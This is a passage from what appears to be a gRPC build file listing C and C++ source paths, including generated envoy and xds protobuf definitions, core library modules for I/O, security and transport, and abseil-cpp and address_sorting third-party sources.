'src/core/ext/upbdefs-generated/envoy/config/overload/v3/overload.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/rbac/v3/rbac.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/route/v3/route.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/route/v3/route_components.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/route/v3/scoped_route.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/tap/v3/common.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/datadog.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/dynamic_ot.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/http_tracer.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/lightstep.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/opencensus.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/service.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/skywalking.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/trace.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/xray.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/zipkin.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/clusters/aggregate/v3/cluster.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/filters/common/fault/v3/fault.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/filters/http/fault/v3/fault.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/filters/http/rbac/v3/rbac.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/filters/http/router/v3/router.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/filters/network/http_connection_manager/v3/http_connection_manager.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/transport_sockets/tls/v3/cert.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/transport_sockets/tls/v3/common.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/transport_sockets/tls/v3/secret.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/transport_sockets/tls/v3/tls.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/transport_sockets/tls/v3/tls_spiffe_validator_config.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/service/discovery/v3/ads.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/service/discovery/v3/discovery.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/service/load_stats/v3/lrs.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/service/status/v3/csds.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/http/v3/cookie.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/http/v3/path_transformation.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/http_inputs.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/metadata.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/node.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/number.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/path.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/regex.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/string.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/struct.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/value.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/metadata/v3/metadata.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/tracing/v3/custom_tag.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/hash_policy.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/http.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/http_status.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/percent.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/range.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/ratelimit_unit.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/semantic_version.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/token_bucket.upbdefs.c',
'src/core/ext/upbdefs-generated/google/api/annotations.upbdefs.c',
'src/core/ext/upbdefs-generated/google/api/expr/v1alpha1/checked.upbdefs.c',
'src/core/ext/upbdefs-generated/google/api/expr/v1alpha1/syntax.upbdefs.c',
'src/core/ext/upbdefs-generated/google/api/http.upbdefs.c',
'src/core/ext/upbdefs-generated/google/api/httpbody.upbdefs.c',
'src/core/ext/upbdefs-generated/google/protobuf/any.upbdefs.c',
'src/core/ext/upbdefs-generated/google/protobuf/descriptor.upbdefs.c',
'src/core/ext/upbdefs-generated/google/protobuf/duration.upbdefs.c',
'src/core/ext/upbdefs-generated/google/protobuf/empty.upbdefs.c',
'src/core/ext/upbdefs-generated/google/protobuf/struct.upbdefs.c',
'src/core/ext/upbdefs-generated/google/protobuf/timestamp.upbdefs.c',
'src/core/ext/upbdefs-generated/google/protobuf/wrappers.upbdefs.c',
'src/core/ext/upbdefs-generated/google/rpc/status.upbdefs.c',
'src/core/ext/upbdefs-generated/opencensus/proto/trace/v1/trace_config.upbdefs.c',
'src/core/ext/upbdefs-generated/udpa/annotations/migrate.upbdefs.c',
'src/core/ext/upbdefs-generated/udpa/annotations/security.upbdefs.c',
'src/core/ext/upbdefs-generated/udpa/annotations/sensitive.upbdefs.c',
'src/core/ext/upbdefs-generated/udpa/annotations/status.upbdefs.c',
'src/core/ext/upbdefs-generated/udpa/annotations/versioning.upbdefs.c',
'src/core/ext/upbdefs-generated/validate/validate.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/annotations/v3/migrate.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/annotations/v3/security.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/annotations/v3/sensitive.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/annotations/v3/status.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/annotations/v3/versioning.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/core/v3/authority.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/core/v3/collection_entry.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/core/v3/context_params.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/core/v3/extension.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/core/v3/resource.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/core/v3/resource_locator.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/core/v3/resource_name.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/type/matcher/v3/matcher.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/type/matcher/v3/regex.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/type/matcher/v3/string.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/type/v3/typed_struct.upbdefs.c',
'src/core/ext/xds/certificate_provider_registry.cc',
'src/core/ext/xds/certificate_provider_store.cc',
'src/core/ext/xds/file_watcher_certificate_provider_factory.cc',
'src/core/ext/xds/xds_api.cc',
'src/core/ext/xds/xds_bootstrap.cc',
'src/core/ext/xds/xds_certificate_provider.cc',
'src/core/ext/xds/xds_channel_creds.cc',
'src/core/ext/xds/xds_channel_stack_modifier.cc',
'src/core/ext/xds/xds_client.cc',
'src/core/ext/xds/xds_client_stats.cc',
'src/core/ext/xds/xds_cluster.cc',
'src/core/ext/xds/xds_common_types.cc',
'src/core/ext/xds/xds_endpoint.cc',
'src/core/ext/xds/xds_http_fault_filter.cc',
'src/core/ext/xds/xds_http_filters.cc',
'src/core/ext/xds/xds_http_rbac_filter.cc',
'src/core/ext/xds/xds_listener.cc',
'src/core/ext/xds/xds_resource_type.cc',
'src/core/ext/xds/xds_route_config.cc',
'src/core/ext/xds/xds_routing.cc',
'src/core/ext/xds/xds_server_config_fetcher.cc',
'src/core/lib/address_utils/parse_address.cc',
'src/core/lib/address_utils/sockaddr_utils.cc',
'src/core/lib/backoff/backoff.cc',
'src/core/lib/channel/channel_args.cc',
'src/core/lib/channel/channel_args_preconditioning.cc',
'src/core/lib/channel/channel_stack.cc',
'src/core/lib/channel/channel_stack_builder.cc',
'src/core/lib/channel/channel_trace.cc',
'src/core/lib/channel/channelz.cc',
'src/core/lib/channel/channelz_registry.cc',
'src/core/lib/channel/connected_channel.cc',
'src/core/lib/channel/handshaker.cc',
'src/core/lib/channel/handshaker_registry.cc',
'src/core/lib/channel/status_util.cc',
'src/core/lib/compression/compression.cc',
'src/core/lib/compression/compression_internal.cc',
'src/core/lib/compression/message_compress.cc',
'src/core/lib/config/core_configuration.cc',
'src/core/lib/debug/stats.cc',
'src/core/lib/debug/stats_data.cc',
'src/core/lib/debug/trace.cc',
'src/core/lib/event_engine/channel_args_endpoint_config.cc',
'src/core/lib/event_engine/event_engine.cc',
'src/core/lib/event_engine/event_engine_factory.cc',
'src/core/lib/event_engine/memory_allocator.cc',
'src/core/lib/event_engine/sockaddr.cc',
'src/core/lib/gpr/alloc.cc',
'src/core/lib/gpr/atm.cc',
'src/core/lib/gpr/cpu_iphone.cc',
'src/core/lib/gpr/cpu_linux.cc',
'src/core/lib/gpr/cpu_posix.cc',
'src/core/lib/gpr/cpu_windows.cc',
'src/core/lib/gpr/env_linux.cc',
'src/core/lib/gpr/env_posix.cc',
'src/core/lib/gpr/env_windows.cc',
'src/core/lib/gpr/log.cc',
'src/core/lib/gpr/log_android.cc',
'src/core/lib/gpr/log_linux.cc',
'src/core/lib/gpr/log_posix.cc',
'src/core/lib/gpr/log_windows.cc',
'src/core/lib/gpr/murmur_hash.cc',
'src/core/lib/gpr/string.cc',
'src/core/lib/gpr/string_posix.cc',
'src/core/lib/gpr/string_util_windows.cc',
'src/core/lib/gpr/string_windows.cc',
'src/core/lib/gpr/sync.cc',
'src/core/lib/gpr/sync_abseil.cc',
'src/core/lib/gpr/sync_posix.cc',
'src/core/lib/gpr/sync_windows.cc',
'src/core/lib/gpr/time.cc',
'src/core/lib/gpr/time_posix.cc',
'src/core/lib/gpr/time_precise.cc',
'src/core/lib/gpr/time_windows.cc',
'src/core/lib/gpr/tmpfile_msys.cc',
'src/core/lib/gpr/tmpfile_posix.cc',
'src/core/lib/gpr/tmpfile_windows.cc',
'src/core/lib/gpr/wrap_memcpy.cc',
'src/core/lib/gprpp/examine_stack.cc',
'src/core/lib/gprpp/fork.cc',
'src/core/lib/gprpp/global_config_env.cc',
'src/core/lib/gprpp/host_port.cc',
'src/core/lib/gprpp/mpscq.cc',
'src/core/lib/gprpp/stat_posix.cc',
'src/core/lib/gprpp/stat_windows.cc',
'src/core/lib/gprpp/status_helper.cc',
'src/core/lib/gprpp/thd_posix.cc',
'src/core/lib/gprpp/thd_windows.cc',
'src/core/lib/gprpp/time_util.cc',
'src/core/lib/http/format_request.cc',
'src/core/lib/http/httpcli.cc',
'src/core/lib/http/httpcli_security_connector.cc',
'src/core/lib/http/parser.cc',
'src/core/lib/iomgr/buffer_list.cc',
'src/core/lib/iomgr/call_combiner.cc',
'src/core/lib/iomgr/cfstream_handle.cc',
'src/core/lib/iomgr/combiner.cc',
'src/core/lib/iomgr/dualstack_socket_posix.cc',
'src/core/lib/iomgr/endpoint.cc',
'src/core/lib/iomgr/endpoint_cfstream.cc',
'src/core/lib/iomgr/endpoint_pair_event_engine.cc',
'src/core/lib/iomgr/endpoint_pair_posix.cc',
'src/core/lib/iomgr/endpoint_pair_windows.cc',
'src/core/lib/iomgr/error.cc',
'src/core/lib/iomgr/error_cfstream.cc',
'src/core/lib/iomgr/ev_apple.cc',
'src/core/lib/iomgr/ev_epoll1_linux.cc',
'src/core/lib/iomgr/ev_epollex_linux.cc',
'src/core/lib/iomgr/ev_poll_posix.cc',
'src/core/lib/iomgr/ev_posix.cc',
'src/core/lib/iomgr/ev_windows.cc',
'src/core/lib/iomgr/event_engine/closure.cc',
'src/core/lib/iomgr/event_engine/endpoint.cc',
'src/core/lib/iomgr/event_engine/iomgr.cc',
'src/core/lib/iomgr/event_engine/pollset.cc',
'src/core/lib/iomgr/event_engine/resolved_address_internal.cc',
'src/core/lib/iomgr/event_engine/resolver.cc',
'src/core/lib/iomgr/event_engine/tcp.cc',
'src/core/lib/iomgr/event_engine/timer.cc',
'src/core/lib/iomgr/exec_ctx.cc',
'src/core/lib/iomgr/executor.cc',
'src/core/lib/iomgr/executor/mpmcqueue.cc',
'src/core/lib/iomgr/executor/threadpool.cc',
'src/core/lib/iomgr/fork_posix.cc',
'src/core/lib/iomgr/fork_windows.cc',
'src/core/lib/iomgr/gethostname_fallback.cc',
'src/core/lib/iomgr/gethostname_host_name_max.cc',
'src/core/lib/iomgr/gethostname_sysconf.cc',
'src/core/lib/iomgr/grpc_if_nametoindex_posix.cc',
'src/core/lib/iomgr/grpc_if_nametoindex_unsupported.cc',
'src/core/lib/iomgr/internal_errqueue.cc',
'src/core/lib/iomgr/iocp_windows.cc',
'src/core/lib/iomgr/iomgr.cc',
'src/core/lib/iomgr/iomgr_custom.cc',
'src/core/lib/iomgr/iomgr_internal.cc',
'src/core/lib/iomgr/iomgr_posix.cc',
'src/core/lib/iomgr/iomgr_posix_cfstream.cc',
'src/core/lib/iomgr/iomgr_windows.cc',
'src/core/lib/iomgr/is_epollexclusive_available.cc',
'src/core/lib/iomgr/load_file.cc',
'src/core/lib/iomgr/lockfree_event.cc',
'src/core/lib/iomgr/polling_entity.cc',
'src/core/lib/iomgr/pollset.cc',
'src/core/lib/iomgr/pollset_custom.cc',
'src/core/lib/iomgr/pollset_set.cc',
'src/core/lib/iomgr/pollset_set_custom.cc',
'src/core/lib/iomgr/pollset_set_windows.cc',
'src/core/lib/iomgr/pollset_windows.cc',
'src/core/lib/iomgr/resolve_address.cc',
'src/core/lib/iomgr/resolve_address_custom.cc',
'src/core/lib/iomgr/resolve_address_posix.cc',
'src/core/lib/iomgr/resolve_address_windows.cc',
'src/core/lib/iomgr/socket_factory_posix.cc',
'src/core/lib/iomgr/socket_mutator.cc',
'src/core/lib/iomgr/socket_utils_common_posix.cc',
'src/core/lib/iomgr/socket_utils_linux.cc',
'src/core/lib/iomgr/socket_utils_posix.cc',
'src/core/lib/iomgr/socket_utils_windows.cc',
'src/core/lib/iomgr/socket_windows.cc',
'src/core/lib/iomgr/tcp_client.cc',
'src/core/lib/iomgr/tcp_client_cfstream.cc',
'src/core/lib/iomgr/tcp_client_custom.cc',
'src/core/lib/iomgr/tcp_client_posix.cc',
'src/core/lib/iomgr/tcp_client_windows.cc',
'src/core/lib/iomgr/tcp_custom.cc',
'src/core/lib/iomgr/tcp_posix.cc',
'src/core/lib/iomgr/tcp_server.cc',
'src/core/lib/iomgr/tcp_server_custom.cc',
'src/core/lib/iomgr/tcp_server_posix.cc',
'src/core/lib/iomgr/tcp_server_utils_posix_common.cc',
'src/core/lib/iomgr/tcp_server_utils_posix_ifaddrs.cc',
'src/core/lib/iomgr/tcp_server_utils_posix_noifaddrs.cc',
'src/core/lib/iomgr/tcp_server_windows.cc',
'src/core/lib/iomgr/tcp_windows.cc',
'src/core/lib/iomgr/time_averaged_stats.cc',
'src/core/lib/iomgr/timer.cc',
'src/core/lib/iomgr/timer_custom.cc',
'src/core/lib/iomgr/timer_generic.cc',
'src/core/lib/iomgr/timer_heap.cc',
'src/core/lib/iomgr/timer_manager.cc',
'src/core/lib/iomgr/unix_sockets_posix.cc',
'src/core/lib/iomgr/unix_sockets_posix_noop.cc',
'src/core/lib/iomgr/wakeup_fd_eventfd.cc',
'src/core/lib/iomgr/wakeup_fd_nospecial.cc',
'src/core/lib/iomgr/wakeup_fd_pipe.cc',
'src/core/lib/iomgr/wakeup_fd_posix.cc',
'src/core/lib/iomgr/work_serializer.cc',
'src/core/lib/json/json_reader.cc',
'src/core/lib/json/json_util.cc',
'src/core/lib/json/json_writer.cc',
'src/core/lib/matchers/matchers.cc',
'src/core/lib/profiling/basic_timers.cc',
'src/core/lib/profiling/stap_timers.cc',
'src/core/lib/promise/activity.cc',
'src/core/lib/resolver/resolver.cc',
'src/core/lib/resolver/resolver_registry.cc',
'src/core/lib/resolver/server_address.cc',
'src/core/lib/resource_quota/api.cc',
'src/core/lib/resource_quota/arena.cc',
'src/core/lib/resource_quota/memory_quota.cc',
'src/core/lib/resource_quota/resource_quota.cc',
'src/core/lib/resource_quota/thread_quota.cc',
'src/core/lib/resource_quota/trace.cc',
'src/core/lib/security/authorization/authorization_policy_provider_vtable.cc',
'src/core/lib/security/authorization/evaluate_args.cc',
'src/core/lib/security/authorization/grpc_authorization_engine.cc',
'src/core/lib/security/authorization/matchers.cc',
'src/core/lib/security/authorization/rbac_policy.cc',
'src/core/lib/security/authorization/sdk_server_authz_filter.cc',
'src/core/lib/security/context/security_context.cc',
'src/core/lib/security/credentials/alts/alts_credentials.cc',
'src/core/lib/security/credentials/alts/check_gcp_environment.cc',
'src/core/lib/security/credentials/alts/check_gcp_environment_linux.cc',
'src/core/lib/security/credentials/alts/check_gcp_environment_no_op.cc',
'src/core/lib/security/credentials/alts/check_gcp_environment_windows.cc',
'src/core/lib/security/credentials/alts/grpc_alts_credentials_client_options.cc',
'src/core/lib/security/credentials/alts/grpc_alts_credentials_options.cc',
'src/core/lib/security/credentials/alts/grpc_alts_credentials_server_options.cc',
'src/core/lib/security/credentials/composite/composite_credentials.cc',
'src/core/lib/security/credentials/credentials.cc',
'src/core/lib/security/credentials/external/aws_external_account_credentials.cc',
'src/core/lib/security/credentials/external/aws_request_signer.cc',
'src/core/lib/security/credentials/external/external_account_credentials.cc',
'src/core/lib/security/credentials/external/file_external_account_credentials.cc',
'src/core/lib/security/credentials/external/url_external_account_credentials.cc',
'src/core/lib/security/credentials/fake/fake_credentials.cc',
'src/core/lib/security/credentials/google_default/credentials_generic.cc',
'src/core/lib/security/credentials/google_default/google_default_credentials.cc',
'src/core/lib/security/credentials/iam/iam_credentials.cc',
'src/core/lib/security/credentials/insecure/insecure_credentials.cc',
'src/core/lib/security/credentials/jwt/json_token.cc',
'src/core/lib/security/credentials/jwt/jwt_credentials.cc',
'src/core/lib/security/credentials/jwt/jwt_verifier.cc',
'src/core/lib/security/credentials/local/local_credentials.cc',
'src/core/lib/security/credentials/oauth2/oauth2_credentials.cc',
'src/core/lib/security/credentials/plugin/plugin_credentials.cc',
'src/core/lib/security/credentials/ssl/ssl_credentials.cc',
'src/core/lib/security/credentials/tls/grpc_tls_certificate_distributor.cc',
'src/core/lib/security/credentials/tls/grpc_tls_certificate_provider.cc',
'src/core/lib/security/credentials/tls/grpc_tls_certificate_verifier.cc',
'src/core/lib/security/credentials/tls/grpc_tls_credentials_options.cc',
'src/core/lib/security/credentials/tls/tls_credentials.cc',
'src/core/lib/security/credentials/tls/tls_utils.cc',
'src/core/lib/security/credentials/xds/xds_credentials.cc',
'src/core/lib/security/security_connector/alts/alts_security_connector.cc',
'src/core/lib/security/security_connector/fake/fake_security_connector.cc',
'src/core/lib/security/security_connector/insecure/insecure_security_connector.cc',
'src/core/lib/security/security_connector/load_system_roots_fallback.cc',
'src/core/lib/security/security_connector/load_system_roots_linux.cc',
'src/core/lib/security/security_connector/local/local_security_connector.cc',
'src/core/lib/security/security_connector/security_connector.cc',
'src/core/lib/security/security_connector/ssl/ssl_security_connector.cc',
'src/core/lib/security/security_connector/ssl_utils.cc',
'src/core/lib/security/security_connector/ssl_utils_config.cc',
'src/core/lib/security/security_connector/tls/tls_security_connector.cc',
'src/core/lib/security/transport/client_auth_filter.cc',
'src/core/lib/security/transport/secure_endpoint.cc',
'src/core/lib/security/transport/security_handshaker.cc',
'src/core/lib/security/transport/server_auth_filter.cc',
'src/core/lib/security/transport/tsi_error.cc',
'src/core/lib/security/util/json_util.cc',
'src/core/lib/service_config/service_config.cc',
'src/core/lib/service_config/service_config_parser.cc',
'src/core/lib/slice/b64.cc',
'src/core/lib/slice/percent_encoding.cc',
'src/core/lib/slice/slice.cc',
'src/core/lib/slice/slice_api.cc',
'src/core/lib/slice/slice_buffer.cc',
'src/core/lib/slice/slice_refcount.cc',
'src/core/lib/slice/slice_split.cc',
'src/core/lib/slice/slice_string_helpers.cc',
'src/core/lib/surface/api_trace.cc',
'src/core/lib/surface/builtins.cc',
'src/core/lib/surface/byte_buffer.cc',
'src/core/lib/surface/byte_buffer_reader.cc',
'src/core/lib/surface/call.cc',
'src/core/lib/surface/call_details.cc',
'src/core/lib/surface/call_log_batch.cc',
'src/core/lib/surface/channel.cc',
'src/core/lib/surface/channel_init.cc',
'src/core/lib/surface/channel_ping.cc',
'src/core/lib/surface/channel_stack_type.cc',
'src/core/lib/surface/completion_queue.cc',
'src/core/lib/surface/completion_queue_factory.cc',
'src/core/lib/surface/event_string.cc',
'src/core/lib/surface/init.cc',
'src/core/lib/surface/init_secure.cc',
'src/core/lib/surface/lame_client.cc',
'src/core/lib/surface/metadata_array.cc',
'src/core/lib/surface/server.cc',
'src/core/lib/surface/validate_metadata.cc',
'src/core/lib/surface/version.cc',
'src/core/lib/transport/bdp_estimator.cc',
'src/core/lib/transport/byte_stream.cc',
'src/core/lib/transport/connectivity_state.cc',
'src/core/lib/transport/error_utils.cc',
'src/core/lib/transport/parsed_metadata.cc',
'src/core/lib/transport/pid_controller.cc',
'src/core/lib/transport/status_conversion.cc',
'src/core/lib/transport/timeout_encoding.cc',
'src/core/lib/transport/transport.cc',
'src/core/lib/transport/transport_op_string.cc',
'src/core/lib/uri/uri_parser.cc',
'src/core/plugin_registry/grpc_plugin_registry.cc',
'src/core/tsi/alts/crypt/aes_gcm.cc',
'src/core/tsi/alts/crypt/gsec.cc',
'src/core/tsi/alts/frame_protector/alts_counter.cc',
'src/core/tsi/alts/frame_protector/alts_crypter.cc',
'src/core/tsi/alts/frame_protector/alts_frame_protector.cc',
'src/core/tsi/alts/frame_protector/alts_record_protocol_crypter_common.cc',
'src/core/tsi/alts/frame_protector/alts_seal_privacy_integrity_crypter.cc',
'src/core/tsi/alts/frame_protector/alts_unseal_privacy_integrity_crypter.cc',
'src/core/tsi/alts/frame_protector/frame_handler.cc',
'src/core/tsi/alts/handshaker/alts_handshaker_client.cc',
'src/core/tsi/alts/handshaker/alts_shared_resource.cc',
'src/core/tsi/alts/handshaker/alts_tsi_handshaker.cc',
'src/core/tsi/alts/handshaker/alts_tsi_utils.cc',
'src/core/tsi/alts/handshaker/transport_security_common_api.cc',
'src/core/tsi/alts/zero_copy_frame_protector/alts_grpc_integrity_only_record_protocol.cc',
'src/core/tsi/alts/zero_copy_frame_protector/alts_grpc_privacy_integrity_record_protocol.cc',
'src/core/tsi/alts/zero_copy_frame_protector/alts_grpc_record_protocol_common.cc',
'src/core/tsi/alts/zero_copy_frame_protector/alts_iovec_record_protocol.cc',
'src/core/tsi/alts/zero_copy_frame_protector/alts_zero_copy_grpc_protector.cc',
'src/core/tsi/fake_transport_security.cc',
'src/core/tsi/local_transport_security.cc',
'src/core/tsi/ssl/key_logging/ssl_key_logging.cc',
'src/core/tsi/ssl/session_cache/ssl_session_boringssl.cc',
'src/core/tsi/ssl/session_cache/ssl_session_cache.cc',
'src/core/tsi/ssl/session_cache/ssl_session_openssl.cc',
'src/core/tsi/ssl_transport_security.cc',
'src/core/tsi/transport_security.cc',
'src/core/tsi/transport_security_grpc.cc',
'third_party/abseil-cpp/absl/base/internal/cycleclock.cc',
'third_party/abseil-cpp/absl/base/internal/low_level_alloc.cc',
'third_party/abseil-cpp/absl/base/internal/raw_logging.cc',
'third_party/abseil-cpp/absl/base/internal/spinlock.cc',
'third_party/abseil-cpp/absl/base/internal/spinlock_wait.cc',
'third_party/abseil-cpp/absl/base/internal/sysinfo.cc',
'third_party/abseil-cpp/absl/base/internal/thread_identity.cc',
'third_party/abseil-cpp/absl/base/internal/throw_delegate.cc',
'third_party/abseil-cpp/absl/base/internal/unscaledcycleclock.cc',
'third_party/abseil-cpp/absl/base/log_severity.cc',
'third_party/abseil-cpp/absl/container/internal/hashtablez_sampler.cc',
'third_party/abseil-cpp/absl/container/internal/hashtablez_sampler_force_weak_definition.cc',
'third_party/abseil-cpp/absl/container/internal/raw_hash_set.cc',
'third_party/abseil-cpp/absl/debugging/internal/address_is_readable.cc',
'third_party/abseil-cpp/absl/debugging/internal/demangle.cc',
'third_party/abseil-cpp/absl/debugging/internal/elf_mem_image.cc',
'third_party/abseil-cpp/absl/debugging/internal/vdso_support.cc',
'third_party/abseil-cpp/absl/debugging/stacktrace.cc',
'third_party/abseil-cpp/absl/debugging/symbolize.cc',
'third_party/abseil-cpp/absl/hash/internal/city.cc',
'third_party/abseil-cpp/absl/hash/internal/hash.cc',
'third_party/abseil-cpp/absl/hash/internal/low_level_hash.cc',
'third_party/abseil-cpp/absl/numeric/int128.cc',
'third_party/abseil-cpp/absl/profiling/internal/exponential_biased.cc',
'third_party/abseil-cpp/absl/random/discrete_distribution.cc',
'third_party/abseil-cpp/absl/random/gaussian_distribution.cc',
'third_party/abseil-cpp/absl/random/internal/pool_urbg.cc',
'third_party/abseil-cpp/absl/random/internal/randen.cc',
'third_party/abseil-cpp/absl/random/internal/randen_detect.cc',
'third_party/abseil-cpp/absl/random/internal/randen_hwaes.cc',
'third_party/abseil-cpp/absl/random/internal/randen_round_keys.cc',
'third_party/abseil-cpp/absl/random/internal/randen_slow.cc',
'third_party/abseil-cpp/absl/random/internal/seed_material.cc',
'third_party/abseil-cpp/absl/random/seed_gen_exception.cc',
'third_party/abseil-cpp/absl/random/seed_sequences.cc',
'third_party/abseil-cpp/absl/status/status.cc',
'third_party/abseil-cpp/absl/status/status_payload_printer.cc',
'third_party/abseil-cpp/absl/status/statusor.cc',
'third_party/abseil-cpp/absl/strings/ascii.cc',
'third_party/abseil-cpp/absl/strings/charconv.cc',
'third_party/abseil-cpp/absl/strings/cord.cc',
'third_party/abseil-cpp/absl/strings/escaping.cc',
'third_party/abseil-cpp/absl/strings/internal/charconv_bigint.cc',
'third_party/abseil-cpp/absl/strings/internal/charconv_parse.cc',
'third_party/abseil-cpp/absl/strings/internal/cord_internal.cc',
'third_party/abseil-cpp/absl/strings/internal/cord_rep_btree.cc',
'third_party/abseil-cpp/absl/strings/internal/cord_rep_btree_navigator.cc',
'third_party/abseil-cpp/absl/strings/internal/cord_rep_btree_reader.cc',
'third_party/abseil-cpp/absl/strings/internal/cord_rep_consume.cc',
'third_party/abseil-cpp/absl/strings/internal/cord_rep_ring.cc',
'third_party/abseil-cpp/absl/strings/internal/cordz_functions.cc',
'third_party/abseil-cpp/absl/strings/internal/cordz_handle.cc',
'third_party/abseil-cpp/absl/strings/internal/cordz_info.cc',
'third_party/abseil-cpp/absl/strings/internal/escaping.cc',
'third_party/abseil-cpp/absl/strings/internal/memutil.cc',
'third_party/abseil-cpp/absl/strings/internal/ostringstream.cc',
'third_party/abseil-cpp/absl/strings/internal/str_format/arg.cc',
'third_party/abseil-cpp/absl/strings/internal/str_format/bind.cc',
'third_party/abseil-cpp/absl/strings/internal/str_format/extension.cc',
'third_party/abseil-cpp/absl/strings/internal/str_format/float_conversion.cc',
'third_party/abseil-cpp/absl/strings/internal/str_format/output.cc',
'third_party/abseil-cpp/absl/strings/internal/str_format/parser.cc',
'third_party/abseil-cpp/absl/strings/internal/utf8.cc',
'third_party/abseil-cpp/absl/strings/match.cc',
'third_party/abseil-cpp/absl/strings/numbers.cc',
'third_party/abseil-cpp/absl/strings/str_cat.cc',
'third_party/abseil-cpp/absl/strings/str_replace.cc',
'third_party/abseil-cpp/absl/strings/str_split.cc',
'third_party/abseil-cpp/absl/strings/string_view.cc',
'third_party/abseil-cpp/absl/strings/substitute.cc',
'third_party/abseil-cpp/absl/synchronization/barrier.cc',
'third_party/abseil-cpp/absl/synchronization/blocking_counter.cc',
'third_party/abseil-cpp/absl/synchronization/internal/create_thread_identity.cc',
'third_party/abseil-cpp/absl/synchronization/internal/graphcycles.cc',
'third_party/abseil-cpp/absl/synchronization/internal/per_thread_sem.cc',
'third_party/abseil-cpp/absl/synchronization/internal/waiter.cc',
'third_party/abseil-cpp/absl/synchronization/mutex.cc',
'third_party/abseil-cpp/absl/synchronization/notification.cc',
'third_party/abseil-cpp/absl/time/civil_time.cc',
'third_party/abseil-cpp/absl/time/clock.cc',
'third_party/abseil-cpp/absl/time/duration.cc',
'third_party/abseil-cpp/absl/time/format.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/civil_time_detail.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_fixed.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_format.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_if.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_impl.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_info.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_libc.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_lookup.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_posix.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/zone_info_source.cc',
'third_party/abseil-cpp/absl/time/time.cc',
'third_party/abseil-cpp/absl/types/bad_optional_access.cc',
'third_party/abseil-cpp/absl/types/bad_variant_access.cc',
'third_party/address_sorting/address_sorting.c',
'third_party/address_sorting/address_sorting_posix.c',
'third_party/address_sorting/address_sorting_windows.c',
